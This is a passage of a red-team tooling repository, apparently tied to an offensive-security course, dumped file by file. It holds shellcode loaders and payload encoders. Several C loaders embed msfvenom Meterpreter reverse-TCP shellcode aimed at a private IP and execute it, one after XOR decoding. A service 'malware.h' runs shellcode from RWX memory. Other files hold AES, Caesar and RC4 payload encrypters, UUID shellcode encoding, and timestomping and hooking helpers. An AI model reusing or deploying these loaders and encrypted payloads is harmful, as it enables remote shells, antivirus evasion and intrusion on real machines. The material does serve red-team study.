19 | _In_ _Out_ PVOID Memory,
20 | _In_ ULONG MemorySize,
21 | _In_ ULONG OptionFlags
22 | );
23 |
24 | typedef NTSTATUS(NTAPI* SystemFunction032)
25 | (
26 | struct ustring* data,
27 | const struct ustring* key
28 | );
29 |
30 | typedef BOOL(WINAPI* SystemFunction036)
31 | (
32 | void* buffer,
33 | ULONG len
34 | );
--------------------------------------------------------------------------------
/C++/RC4_SysFunc032_Encrypter/typedefs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | struct ustring {
5 | DWORD Length;
6 | DWORD MaximumLength;
7 | PUCHAR Buffer;
8 | } _data, key;
9 |
10 | typedef BOOL (WINAPI* SystemFunction040)
11 | (
12 | _In_ _Out_ PVOID Memory,
13 | _In_ ULONG MemorySize,
14 | _In_ ULONG OptionFlags
15 | );
16 |
17 | typedef BOOL (WINAPI* SystemFunction041)
18 | (
19 | _In_ _Out_ PVOID Memory,
20 | _In_ ULONG MemorySize,
21 | _In_ ULONG OptionFlags
22 | );
23 |
24 | typedef NTSTATUS(NTAPI* SystemFunction032)
25 | (
26 | struct ustring* data,
27 | const struct ustring* key
28 | );
29 |
30 | typedef BOOL(WINAPI* SystemFunction036)
31 | (
32 | void* buffer,
33 | ULONG len
34 | );
--------------------------------------------------------------------------------
/C++/API_Hooking/Detours/ToHook/hookme.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | This exe is compiled and executed.
3 | Then the HookExe compiled DLL is injected into this process
4 | and Detour hooks inside.
5 | There is a defined method for MessageBoxW inside the DLL which will look for
6 | the MessageBoxW API.
7 | If its found, then a hook will be attached and upon unhooking the process will
8 | be terminated.
9 | */
10 |
11 | #include
12 | #include
13 | #pragma comment(lib, "user32.lib")
14 |
15 | int main() {
16 | printf("hookme.exe: Starting program....\n");
17 |
18 | MessageBoxW(NULL, L"MessageBox1", L"HOOK1", MB_OK);
19 | MessageBoxW(NULL, L"MessageBox2", L"HOOK2", MB_OK);
20 | MessageBoxW(NULL, L"MessageBox3", L"HOOK3", MB_OK);
21 |
22 |
23 | printf("hookme.exe: Exitting now...\n");
24 |
25 | return 0;
26 | }
--------------------------------------------------------------------------------
/C++/API_Hooking/Detours/HookExe/detours/detver.h:
--------------------------------------------------------------------------------
1 | //////////////////////////////////////////////////////////////////////////////
2 | //
3 | // Common version parameters.
4 | //
5 | // Microsoft Research Detours Package, Version 4.0.1
6 | //
7 | // Copyright (c) Microsoft Corporation. All rights reserved.
8 | //
9 |
10 | #define _USING_V110_SDK71_ 1
11 | #include "winver.h"
12 | #if 0
13 | #include
14 | #include
15 | #else
16 | #ifndef DETOURS_STRINGIFY
17 | #define DETOURS_STRINGIFY_(x) #x
18 | #define DETOURS_STRINGIFY(x) DETOURS_STRINGIFY_(x)
19 | #endif
20 |
21 | #define VER_FILEFLAGSMASK 0x3fL
22 | #define VER_FILEFLAGS 0x0L
23 | #define VER_FILEOS 0x00040004L
24 | #define VER_FILETYPE 0x00000002L
25 | #define VER_FILESUBTYPE 0x00000000L
26 | #endif
27 | #define VER_DETOURS_BITS DETOURS_STRINGIFY(DETOURS_BITS)
28 |
--------------------------------------------------------------------------------
/C++/ServiceShell/ServiceShell.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
--------------------------------------------------------------------------------
/C++/bin2uuid.py:
--------------------------------------------------------------------------------
1 | # Author: Bobby Cooke (0xBoku/boku/boku7) // https://twitter.com/0xBoku // github.com/boku7 // https://www.linkedin.com/in/bobby-cooke/ // https://0xboku.com
2 | # Modified code from: https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala
3 | #!/usr/bin/env python3
4 |
5 | from uuid import UUID
6 | import sys
7 |
8 | if len(sys.argv) < 2:
9 | print("Usage: %s " % sys.argv[0])
10 | sys.exit(1)
11 |
12 | with open(sys.argv[1], "rb") as f:
13 | chunk = f.read(16)
14 | print("{}CHAR* uuids[] =".format(' '*4))
15 | print(" {")
16 | while chunk:
17 | if len(chunk) < 16:
18 | padding = 16 - len(chunk)
19 | chunk = chunk + (b"\x90" * padding)
20 | print("{}\"{}\"".format(' '*8,UUID(bytes_le=chunk)))
21 | break
22 | print("{}\"{}\",".format(' '*8,UUID(bytes_le=chunk)))
23 | chunk = f.read(16)
24 | print(" };")
25 |
--------------------------------------------------------------------------------
/C++/Timestomp/typedefs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | #include "ntstructs.h"
5 |
6 | char strNtSetInformationFile[] = { 'N','t','S','e','t','I','n','f','o','r','m','a','t','i','o','n','F','i','l','e', 0x0 };
7 | char strNtQueryInformationFile[] = { 'N','t','Q','u','e','r','y','I','n','f','o','r','m','a','t','i','o','n','F','i','l','e', 0x0 };
8 |
9 | typedef NTSTATUS(NTAPI *fnNtQueryInformationFile)(
10 | _In_ HANDLE FileHandle,
11 | _Out_ PIO_STATUS_BLOCK IoStatusBlock,
12 | _Out_ PVOID FileInformation,
13 | _In_ ULONG Length,
14 | _In_ FILE_INFORMATION_CLASS FileInformationClass
15 | );
16 |
17 | typedef NTSTATUS (NTAPI *fnNtSetInformationFile)(
18 | _In_ HANDLE FileHandle,
19 | _Out_ PIO_STATUS_BLOCK IoStatusBlock,
20 | _In_ PVOID FileInformation,
21 | _In_ ULONG Length,
22 | _In_ FILE_INFORMATION_CLASS FileInformationClass
23 | );
--------------------------------------------------------------------------------
/CSharp/Linux-Post-Exploitation/shellcode_loader.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | // gcc -o loader loader.c -z execstack
6 | // msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.49.120 lport=443 -f c
7 | //Shellcode
8 | unsigned char buf[] =
9 | "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
10 | "\xff\xff\x48\xbb\xa5\x97\x4d\xc9\xc4\xe6\x49\x88\x48\x31\x58"
11 | "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xcf\xbe\x15\x50\xae\xe4"
12 | "\x16\xe2\xa4\xc9\x42\xcc\x8c\x71\x01\x31\xa7\x97\x4c\x72\xce"
13 | "\xec\x49\x08\xf4\xdf\xc4\x2f\xae\xf6\x13\xe2\x8f\xcf\x42\xcc"
14 | "\xae\xe5\x17\xc0\x5a\x59\x27\xe8\x9c\xe9\x4c\xfd\x53\xfd\x76"
15 | "\x91\x5d\xae\xf2\xa7\xc7\xfe\x23\xe6\xb7\x8e\x49\xdb\xed\x1e"
16 | "\xaa\x9b\x93\xae\xc0\x6e\xaa\x92\x4d\xc9\xc4\xe6\x49\x88";
17 |
18 | int main(int argc, char **argv)
19 | {
20 | // Run the shellcode
21 | int (*ret)() = (int(*)())buf;
22 | ret();
23 | }
24 |
--------------------------------------------------------------------------------
/C++/aes_encrypt_py3.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with AES
3 | #
4 | # author: reenz0h (twitter: @SEKTOR7net)
5 |
6 | import sys
7 | from base64 import b64encode
8 | from Crypto.Cipher import AES
9 | from Crypto.Util.Padding import pad
10 | from Crypto.Random import get_random_bytes
11 | import hashlib
12 |
13 | KEY = get_random_bytes(16)
14 | iv = 16 * b'\x00'
15 | cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
16 |
17 | try:
18 | plaintext = open(sys.argv[1], "rb").read()
19 | except:
20 | print("File argument needed! %s " % sys.argv[0])
21 | sys.exit()
22 |
23 | ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
24 |
25 | open("rcdata1.bin", "wb").write(ciphertext)
26 | print("Shellcode saved to rcdata1.bin")
27 |
28 | print('unsigned char key[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
29 | print('unsigned char shellcode[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')
--------------------------------------------------------------------------------
/CSharp/ShellcodeBuilder_Caesar/Caesar_Builder.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 |
4 | namespace ShellcodeBuilder_Caesar
5 | {
6 | class Caesar_Builder
7 | {
8 | static void Main(string[] args)
9 | {
10 | // Shellcode
11 | // msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.0.128 LPORT=443 -f csharp
12 | // HERE
13 |
14 | byte[] encoded = new byte[buf.Length];
15 | for (int i = 0; i < buf.Length; i++)
16 | {
17 | encoded[i] = (byte)(((uint)buf[i] + 983) & 0xFF);
18 | }
19 |
20 | StringBuilder hex = new StringBuilder(encoded.Length * 2);
21 | foreach (byte b in encoded)
22 | {
23 | hex.AppendFormat("0x{0:x2}, ", b);
24 | }
25 | Console.WriteLine("[+] Length of new payload: " + buf.Length);
26 | Console.WriteLine("[+] Payload: " + hex.ToString());
27 | }
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/C++/Heaven's_Gate/wow64.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | //
5 | // Definitions used for running native x64 code from a wow64 process
6 | // https://github.com/rapid7/meterpreter/blob/5e24206d510a48db284d5f399a6951cd1b4c754b/source/common/arch/win/i386/base_inject.h
7 | //
8 | typedef BOOL(WINAPI* X64FUNCTION)(
9 | DWORD dwParameter
10 | );
11 |
12 | typedef DWORD(WINAPI* EXECUTEX64)(
13 | X64FUNCTION pFunction,
14 | DWORD dwParameter
15 | );
16 |
17 |
18 | //
19 | // The context used for injection via migrate_via_remotethread_wow64
20 | //
21 | typedef struct _WOW64CONTEXT {
22 | union {
23 | HANDLE hProcess;
24 | BYTE bPadding2[8];
25 | } h;
26 |
27 | union {
28 | LPVOID lpStartAddress;
29 | BYTE bPadding1[8];
30 | } s;
31 |
32 | union {
33 | LPVOID lpParameter;
34 | BYTE bPadding2[8];
35 | } p;
36 | union {
37 | HANDLE hThread;
38 | BYTE bPadding2[8];
39 | } t;
40 | } WOW64CONTEXT, * LPWOW64CONTEXT;
--------------------------------------------------------------------------------
/C++/FunctionCast/FunctionCast.cpp:
--------------------------------------------------------------------------------
1 | #pragma section(".text")
2 |
3 | // pops calc
4 | __declspec(allocate(".text")) static unsigned char buf[] =
5 | "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
6 | "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
7 | "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
8 | "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
9 | "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
10 | "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
11 | "\x48\x83\xec\x20\x41\xff\xd6";
12 |
13 |
14 | int main()
15 | {
16 | (*(void(*)())(&buf))();
17 | }
--------------------------------------------------------------------------------
/C++/GA_Runner/GA_Runner.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/SCMDelivery/SCMDelivery.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/minidump/minidump.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/FunctionCast/FunctionCast.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/APC_Injection/APC_Injection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/API_Hooking/Detours/ToHook/ToHook.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/AlternateDataStream/AlternateDataStream.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/ETW/ETW-Silencer/ETW-Silencer.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/SC_CreateFiber/SC_CreateFiber.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/VirtualAlloc2/VirtualAlloc2.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/API_Hooking/IAT_Hooking/IAT_Hooking.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/Caesar_Encrypter/Caesar_Encrypter.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/CreateThreadPool/CreateThreadPool.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/API_Hooking/Inline-Minidump/Inline-Minidump.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/Process_Ninjection/Process_Ninjection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/HeapAlloc_ShellCRunner/HeapAlloc_ShellCRunner.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/API_Hooking/Inline-VirtualAlloc/Inline-VirtualAlloc.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/CSharp/Linux-Post-Exploitation/xor_shellcode_loader.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | // gcc -o loader loader.c -z execstack
6 |
7 | //Shellcode
8 | // Paste in the encrypted xor shellcode
9 | unsigned char buf[] = "\x02\x7B\x83\x02\xCB\xA3\xBC\xB5\xB5\xB5\x02\xC7\x4F\xA5\xB5\xB5\xB5\x02\xF1\xFD\x9A\xFF\xF2\xBE\xDA\x73\x79\x02\x7B\x12\x6D\x02\x67\xB2\xB5\xB5\xB5\xA8\xBE\x97\xB3\xA7\x6B\xD4\xD8\x2C\x13\xFC\xC4\xF0\xF7\xF6\x4D\x3B\xC0\xFF\x9A\xFE\x49\xB4\xD0\x73\xF9\xAC\xD2\x76\x14\xD4\xCA\x29\x13\xD7\xC2\xF0\xF7\xD4\xD9\x2D\x31\x02\x54\x95\xD3\xE6\xD5\x76\x0C\x0B\xF0\xC4\xAA\x27\x92\xC8\x56\x9F\xF3\x91\xDD\xCD\xB2\x73\x2A\xB5\x13\x18\xA0\xE9\x92\xFA\x9F\xF2\x9F\xFF\xF2\xBE\xDA\x73\x79\x4A";
10 |
11 | int main(int argc, char **argv)
12 | {
13 | //Arbitrary value
14 | char xor_key = 'J';
15 | int arraysize = (int) sizeof(buf);
16 | for (int i=0; i < arraysize - 1; i++)
17 | {
18 | buf[i] = buf[i] ^ xor_key;
19 | }
20 | // Run the shellcode
21 | int (*ret)() = (int(*)())buf;
22 | ret();
23 | }
24 |
--------------------------------------------------------------------------------
/C++/ServiceShell/malware.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include "shellcode.h"
3 |
4 | PVOID VxMoveMemory(
5 | _Inout_ PVOID dest,
6 | _In_ const PVOID src,
7 | _In_ SIZE_T len
8 | );
9 |
10 | PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
11 | char* d = (char*)dest;
12 | char* s = (char*)src;
13 | if (d < s)
14 | while (len--)
15 | *d++ = *s++;
16 | else {
17 | char* lasts = s + (len - 1);
18 | char* lastd = d + (len - 1);
19 | while (len--)
20 | *lastd-- = *lasts--;
21 | }
22 | return dest;
23 | }
24 |
25 | int malware(void) {
26 |
27 | SIZE_T size_shellcode = sizeof(buf);
28 |
29 | PVOID ptr = NULL;
30 | HANDLE hThread = NULL;
31 |
32 | ptr = VirtualAlloc(
33 | NULL,
34 | size_shellcode,
35 | (MEM_COMMIT | MEM_RESERVE),
36 | PAGE_EXECUTE_READWRITE);
37 |
38 | if (ptr == NULL) {
39 | return EXIT_FAILURE;
40 | }
41 |
42 | VxMoveMemory(ptr, buf, size_shellcode);
43 |
44 | hThread = CreateThread(
45 | NULL,
46 | 0,
47 | (LPTHREAD_START_ROUTINE)ptr,
48 | NULL,
49 | 0,
50 | 0);
51 |
52 | WaitForSingleObject(hThread, INFINITE);
53 | return 0;
54 | }
55 |
--------------------------------------------------------------------------------
/CSharp/Linux-Post-Exploitation/xor_shellcode_encoder.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | //Shellcode
6 | // msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.x.120 lport=443 -f c
7 | unsigned char buf[] =
8 | "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
9 | "\xff\xff\x48\xbb\xb7\xd0\xb5\xb8\xf4\x90\x39\x33\x48\x31\x58"
10 | "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xdd\xf9\xed\x21\x9e\x92"
11 | "\x66\x59\xb6\x8e\xba\xbd\xbc\x07\x71\x8a\xb5\xd0\xb4\x03\xfe"
12 | "\x9a\x39\xb3\xe6\x98\x3c\x5e\x9e\x80\x63\x59\x9d\x88\xba\xbd"
13 | "\x9e\x93\x67\x7b\x48\x1e\xdf\x99\xac\x9f\x3c\x46\x41\xba\x8e"
14 | "\xe0\x6d\xd8\x82\x1c\xd5\xb9\xdb\x97\x87\xf8\x39\x60\xff\x59"
15 | "\x52\xea\xa3\xd8\xb0\xd5\xb8\xd5\xb5\xb8\xf4\x90\x39\x33";
16 |
17 | int main (int argc, char **argv)
18 | {
